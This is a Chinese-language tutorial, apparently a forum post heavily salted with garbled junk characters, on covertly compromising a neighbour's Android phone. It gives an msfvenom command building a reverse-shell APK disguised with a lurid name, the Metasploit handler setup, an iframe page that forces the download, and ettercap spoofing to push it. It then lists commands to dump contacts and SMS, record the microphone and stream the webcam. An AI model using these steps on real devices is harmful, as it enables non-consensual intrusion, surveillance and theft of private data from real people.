# J2 s8 E& L1 ~: r; G' z
五、msf+ettercap入侵邻居安卓手机 ) X* b/ x8 G) S3 {! a9 A7 L
1 I0 o- \5 t% ]/ ~% q) K
0 {' A% U, P- @" p( C% L# g" D 首先启动msf
# J2 \, K' s2 \9 {# D! K7 F* p
5 W" t) n* L" f1 X7 t; m- n* ^
0 o, k1 ~1 ]& Q5 Q0 k7 M- ?) g' p( X 先用kali生成一个安卓木马,如下命令: _4 n& I, z( d+ o2 f
8 U" r. j( ~# x* Z
0 \6 n1 n% I) j9 Y( ?9 t/ u) G4 t Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
6 K$ p6 f$ I1 x% } _, u 6 w3 d- w& t w! V/ I- i
7 D* Q0 X( E P( y1 ] 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 6 j4 o( S& Z, Q5 A( A0 }3 v" s- T
: K% i. w* y! d; H# T9 [ f
) c8 x' T7 }6 c" I' g
然后进入msf
" u9 s4 k- ]* t- C* D4 b' V" o ^3 \" m n( U, @# K9 v. B
5 P: u) k3 R5 g+ w5 V# W# O6 ~
use exploit/multi/handler ! ]/ \) S h% X
+ j3 ]; D8 }* Z$ }- |: K
: D* d) E# K7 z5 j set payload android/meterpreter/reverse_tcp + ~- j' y( ^ W( J/ O
0 u: b6 u7 I/ ?' L7 W
, |2 J8 o5 O P set LHOST 192.168.0.109 //ip为kaili的ip 6 j1 S5 H9 F/ `4 e) {
+ j! }2 c/ ^& B H/ Y
+ Q6 c$ Q* _9 m" Y4 j, J5 ^
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
- F$ C, }! t3 m) _+ Y
' a8 g0 H% b [) f, [
2 A* M0 O+ x& D1 ^/ K1 P3 q; A Exploit " ^" s0 a4 q! n
# K) w* [8 p; {3 a' d( B# l, x: _! V# [+ J
7 ^: s0 y' z( K) r: A% l/ g
; q, d( {. ?1 r$ f2 Y: w
6 N3 X+ U0 C! y# |% a
下面我们开启ettercap -G
7 u: K1 D7 x: }2 `- S+ z! K& p/ M9 x% S % v: C2 ?) t; X r/ H
l/ K+ w# [' ^: g) r 我物理IP为
8 K% r9 G6 k, B2 q0 y" Q/ ?) ?/ M . p# D `2 O: O# j( y P
" p0 Z, ^7 S) U0 Z! Z* k T; k1 ^$ N, j
- o- k& q5 O) `8 V% m
$ V3 Q4 U& R" z* l3 S/ y 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
0 {1 q0 j: l5 h$ K, L Z% P
% q5 g/ Q& B# j- ? z
5 \4 Q" ?) X0 c 下面我们来设置一下 9 e+ ~5 d$ I y) \9 s# J g; [: B$ R
$ Y- z; N9 A( ~$ {: x' A4 H1 b/ [: H, q# b d, G5 B5 F; y, o
# X- O( R+ \ y" g& _ x! Q. B9 M$ q% u
1 C6 Z8 x2 A/ ~' b) @* r 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, r! U' q8 U; ]4 P
# q W( G8 r- T/ X
/ q# N$ L! c9 g+ B4 x . G. G! \! G4 [( N
4 P7 F% d: W2 Q) _+ ]) ^+ }3 Q
; E# f# X/ r- n, Y8 W ; I, J6 @. @* T% z x% C
? n! _% w/ E9 |8 Q4 q8 P# u# |4 I4 Y& ^& Y9 Y0 I! Q
6 \- U: f) h# Q7 L7 z* N# \ 6 O2 U4 l+ b' ]3 F8 `
' V7 n6 l9 a* r. y8 }
/ \ ?# l& H4 I$ R. H
/ }7 G3 h& S+ _5 ?
! y3 r5 T- Z/ n/ ^ }' v/ D* a
0 y. P: @( A2 d9 @! N; u& L! l 5 _# u5 p. r0 v' c) H. X
% h x5 Z$ {- w - t' b0 U2 i5 N( r) O- o3 P
9 r1 s; S+ Z- i$ H+ t1 H8 K4 i! d- e! X$ F& P
7 S4 Y l+ n+ m% A, S
; W) O# ]5 l* T; S
/ B$ l4 {6 K4 |9 O4 M: _4 ^ 5 h0 V; K) u4 R( r
' I; x6 S9 P9 t3 a; Y7 J2 u" c
8 Y. B' f7 T9 o( B" F! Q" O# P - S0 g: ~) o3 S# ]* o
) h! ?! b1 }6 Z: B; b( ]
9 n2 b8 U ?+ z
, v1 ^7 |6 {% R& ~8 N- _
+ m; B* S2 d5 M- r# e0 d) I2 n
% \5 z$ ?" @: P( _2 n " d& W3 H y4 y# ^( c
! n: A, r( Y/ e0 S+ M! v1 O! V
& o+ g4 A) l+ a
7 c) W: |6 _# l# c+ V$ Q- Q1 q y
3 u7 u& r- g/ ]- ?
" |& _' z: O" j ' W2 `$ E; y8 U; j2 ~/ Y5 H4 z
! y! @- n J( x, L* ^8 ^3 U
) a% [% E% e" y" e z! X 下面我们开始攻击 + N, F( t6 v0 E) }
- ^9 X9 n4 G' c w/ _5 h( _( a. o, [# I' M6 t
/ f1 ?9 \% C' N1 X! H 8 G7 p4 w% L# g3 |
% {% j( F8 h. ]) K! w1 i# [+ F 7 s$ _# k; Q w# L1 h& u5 p* O! G
9 J+ L/ J3 w* h% n
" _' @/ ~, A B( i2 ^$ [0 t
5 u% g7 |% ^0 g8 r6 `" K% [
% P/ Z# b# j2 D# f9 g
+ Q* Y$ K9 T) V) r: W4 U$ F( \
% a$ @/ K h$ P0 i5 ?1 ^( |, Q M
) v( n: P% k S' O) y3 w# j8 f) L( l/ j; y( n( V# ]9 }
, C8 r, e# ~7 O 6 k' l2 I; E' J4 P8 g0 j
% F; u: N' e9 Y0 c) R
大概过了5分钟多,发现反弹成功了 + n7 B0 }3 U: f1 M- L% w# C: w1 u
8 c3 r+ d5 u7 B/ o
$ O7 _/ b. M1 ~8 d- B$ v% G' C
& @: P! G) w \* q: e; Y
X% d- D4 W" O) `: O$ ~
7 Z: n$ b1 I) }! i. j& ? B* ^; }9 P
' q" k6 [% K' N4 v & N8 |9 u) I& Y9 z! c9 X4 P" b4 I
* r" S2 e/ q- p
$ e) q. c9 F) c" r. G
! Z+ K% q( p2 N" w5 e* `' r% r8 K: |" R% Y+ J/ r1 q; x$ P
! @: z2 r, x H! s/ L% \% M
# H6 D$ M. s- T* c5 D6 M( ], w, ?7 K# j# u/ ~) j0 }, L9 X8 T* M8 Y
' \" j. n1 ]7 Q* q* C, s% A 4 T, t- t7 n$ j7 W+ S- M( |
* V) r% S( e7 V5 w/ {, x
- F8 l5 o! |- X J; j B 3 g2 n0 w) t: a4 b. t* f* K
: P- N) B0 x6 G/ k2 Y 3 H4 Y; z t& J1 B. ?$ l8 H
6 D: u: J! R! d/ r0 s/ ]& a
* m1 P; ], u2 _' T 执行命令 : R# K' D9 C% _+ O% {
- g* M( f/ x/ z3 @ ?. W& U; W
9 r* h) m* A. X j1 }; ~, C( L % l" Z0 V/ P' q) O" A
3 B2 ?# E7 ?! _% I& S/ \: i/ _$ u: C
dump_contacts --》这个是导出电话 : x0 a' z6 U2 c' _, {8 r
6 [2 r, P( Y7 B
" }6 Q! F/ @* p dump_sms --》这个是导出信息 $ M; H& l m* q. u: p
3 } ?% h- g* c7 a4 I9 T, k7 V# ?3 \
# c) l* u9 w' h; M h record_mic Record audio from the default microphone for X seconds 2 s- `& |9 d8 T, J
& Q) \; ^( \- N: J; P
/ y! l7 Z8 {' x" H" C$ ^8 z- P2 B
webcam_chat Start a video chat " O1 f& y: \' K) [8 C; J1 I
: m2 l+ ]- ~2 Z0 {# T
( N% B( F- C( y, Y U; S webcam_list List webcams
6 m; P; Q: K* r. P- U
. i4 _: C3 m" o" e) x
. H0 S! h+ t3 k5 A8 E webcam_snap Take a snapshot from the specified webcam
* b1 k s6 \3 n; ~ ! M9 ^, I2 j( t. p
/ p# [- V* I) v$ J+ ?7 j- `4 m# ^ webcam_stream   lay a video stream from the specified webcam
5 j' `& w0 z& h& y: L
! N5 M9 c/ X3 F+ E
: P& [- J4 L( `; x1 O' A0 z
8 \2 N1 P7 W6 O* Z; Q. m * r) F1 `# q2 N# Q! T
& j/ E3 \( ^0 B5 L9 H% T% z9 W
9 ^, u* V; g; V& @3 W% [, G7 X3 J ! O. S* ]- d ^5 B
8 L5 [! X4 h3 K8 s2 u
我们打开看一下电话薄, ! |; Z& C- E# w4 N, q8 o$ U
0 g$ N, i! a% P# I
& I y- F, q2 s+ I* W0 @ ! X0 e4 _1 t& Q2 ^
: y! @4 K1 ?$ f2 [7 y/ U U* @0 m) F4 J) T4 ?! N/ k
$ Q4 H* D2 {, Z & h( H4 S& [4 L- j7 {! U
& }; n: {0 ?$ T
: g! G% j6 ^1 j1 S' c8 h6 a 3 {1 ]6 S L7 k# w3 k4 p
- p1 E0 u; ]! E# n, ?" Y# [
. T; a0 p8 u8 Y; |" Z
}8 j- ]! i$ K2 {6 V* ?# G/ e4 v/ q+ j: l3 X! q# i; \
w, n, { j8 |7 x
$ Y' {6 X" \1 |5 w6 ~. k D0 Y9 e4 W, v C* C
: Z) d0 r* V% ]8 @& T. U
8 ^/ x0 A/ {2 ^. b
& E, j; s! l& q& b7 n& ^% H2 q
我们同时欺骗成DroidJack木马,使用方法如图: " O8 a8 W7 _3 ?
( k+ W; t( t9 a( |" j" u4 M6 c% n+ O. X. d" W0 s2 j4 l
% N, u* Y; ?, t8 E* J2 ]
5 o8 O$ N5 z$ @( t& m
) J0 }( ?/ F6 z: s/ m" S
# B5 v$ ^* }+ ~2 ] + Z( h4 |3 y9 t" k8 Q) ^+ [ M( [
+ G& M7 D" w+ l8 c0 i/ W* X# }9 g# W % n: J$ Q7 [* F; I
" g5 ?' z. ~( Z9 z, S9 f. H5 C
* ?7 H) H3 q% D# G 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 8 a) k+ }1 H# ?' ?1 q6 `1 ^
. d$ X# q0 F( B( Q9 o# r
& S' Y2 J& n8 J& P$ m
# O8 t5 w' V0 F$ n0 g 2 p9 O% Z+ H' u5 @
) O0 ]1 ~9 ? J1 m* F" D
, s. L, w# y6 E
0 b* O, m; w% t- U: |' }7 x
6 O9 M5 g, E4 J- G3 J $ Q2 M" g+ u6 @7 X1 t
* |2 r' X$ b+ y# l6 H: E2 i
! X9 X$ |8 {# m' t; j) q% Y# Q% q
 9 F/ t, G9 R3 R5 _) e. q7 p
5 f* d; T: c# X$ g6 m9 n. ^& f9 m- O; Q3 T
6 g+ _& `) c( t! z, X: V2 w4 W |